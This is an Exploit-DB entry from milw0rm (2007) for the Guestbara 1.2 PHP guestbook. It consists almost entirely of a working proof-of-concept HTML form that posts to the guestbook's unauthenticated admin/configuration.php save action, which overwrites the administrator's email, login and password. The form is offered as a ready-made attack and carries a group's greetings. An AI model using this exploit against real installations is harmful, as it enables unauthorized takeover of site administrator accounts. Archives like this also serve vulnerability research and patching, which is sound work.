Guestbara 1.2 - Change Admin Login and Password

EDB-ID:

3506


Author:

Kacper

Type:

webapps


Platform:

PHP

Date:

2007-03-18


<html>
<title>Guestbara &lt;= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>

<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr>

<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td  colspan=2 align=center>
  <p>
    <input type='submit' name='submit' value='Zachowaj'>
  </p>
  <p>by Kacper  </p>
  <p>for</p>
  <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p>&nbsp;</p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>

# milw0rm.com [2007-03-18]